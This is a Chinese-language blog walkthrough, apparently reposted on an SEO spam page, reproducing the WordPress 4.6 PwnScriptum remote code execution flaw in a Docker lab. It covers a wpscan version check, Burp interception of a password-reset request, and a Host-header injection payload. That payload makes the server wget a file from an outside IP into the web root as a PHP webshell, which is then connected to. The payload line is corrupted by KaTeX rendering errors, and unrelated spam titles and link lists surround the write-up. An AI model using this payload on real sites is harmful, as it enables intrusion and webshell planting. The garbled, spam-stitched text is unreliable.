当前位置: 首页 > news >正文

开发网站需要多少钱软件外包公司排行榜

开发网站需要多少钱,软件外包公司排行榜,科技公司的网站建设费入什么科目,网站建设详细流程文章目录 一、搭建环境二、漏洞复现1.抓包2.准备payload3.发送payload4.检查是否上传成功5.连接payload 国外的:Wordpress,Drupal,Joomla,这是国外最流行的3大CMS。国内则是DedeCMS和帝国,PHPCMS等。 国内的CMS会追求大…

文章目录

  • 一、搭建环境
  • 二、漏洞复现
    • 1.抓包
    • 2.准备payload
    • 3.发送payload
    • 4.检查是否上传成功
    • 5.连接payload

国外的:Wordpress,Drupal,Joomla,这是国外最流行的3大CMS。国内则是DedeCMS和帝国,PHPCMS等。
国内的CMS会追求大而全,而国外的CMS更注重生态,更注重友好的接口,更多的功能留给第三方开发插件来实现。
推荐几个比较新的:ProcessWire,OctoberCMS,CraftCMS

一、搭建环境

进入wordpress里的pwnscriptum里运行docker
docker-compose up -d 拉取环境
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

扫描一下wordpress的版本,只有4.6及以下的版本才有这个漏洞
wpscan --url http://192.168.25.128:8080/
在这里插入图片描述

二、漏洞复现

1.抓包

点击忘记密码,输入刚才创建的用户名或者电子邮箱
在这里插入图片描述

开启burp抓包拦截
在这里插入图片描述

2.准备payload

Host: aa(any -froot@localhost -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum…{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}var{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}www{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}html{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wutiangui.php{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}192.168.155.2:…{substr{0}{1}{$spool_directory}}payload.txt}} null)
这句话的意思是从192.168.155.2 这个IP地址上下载文件payload.txt 到靶机上的var/www/html目录下的wutiangui.php文件里

3.发送payload

通过BP把一句话木马输入到靶机上,测试一下是否可以通过BP写入成功
在这里插入图片描述

4.检查是否上传成功

在这里插入图片描述

网页回显没报错,应该成功了
执行后进入以下目录查看
/var/lib/docker/overlay2/b0766f51462cbcb76c2f483c439ab74adce69f6b1f5325b69f67ef889ee3b21e/merged/var/www/html
在这里插入图片描述

可以发现生成wutiangui.php
在这里插入图片描述

5.连接payload

用御剑连接成功
在这里插入图片描述
在这里插入图片描述

http://www.mmbaike.com/news/72516.html

相关文章:

  • 个人网站做cpa网络优化是做啥的
  • 文化传播公司网站模板软件开发公司排名
  • 网站做竞价对seo有影响吗太原百度快速排名提升
  • 浙江省网站备案注销申请表搜索营销
  • wordpress文章复制粘贴图片保存网奇seo培训官网
  • 网站开发企业排名开网站怎么开
  • 做企业网站用哪个软件专业的制作网站开发公司
  • 做网站建设的名声很差吗产品网络营销
  • 院校门户网站建设方案百度allin 人工智能
  • 网站上的站点地图链接是这么做的网站关键词优化排名软件
  • 生态城门户网站 建设动态企业网络推广软件
  • 做内销的网站推荐一个企业seo网站的优化流程
  • 厦门网站建设教学亚马逊排名seo
  • wordpress文章页随机文章seo引擎优化工具
  • 系统开发是什么意思seo优化有哪些
  • 品牌设计公司排名广州设计长沙百度推广优化排名
  • 怎样做_网站做seo深圳网络推广引流
  • 网站手机版模板免费下载最新疫情消息
  • 西安网站空间百度seo排名优化公司哪家强
  • 联客易外贸网站建设推广好消息tvapp电视版
  • 企业做网站etp和源程序三亚百度推广地址
  • 做品牌网站公司上海seo优化公司
  • 网络广告的优点和缺点seo技术自学
  • 做网站要学些什么优化设计答案六年级
  • 淘宝网站开发框架培训网站搭建
  • 哪些网站是做色选机销售的阿里域名注册网站
  • 佛山网站建设外包公司搜索引擎的三个技巧
  • photoshop永久免费版百度seo不正当竞争秒收
  • 加盟网站分页怎么做seo全国疫情防控最新数据
  • 网站审查元素 可做代码百度经验手机版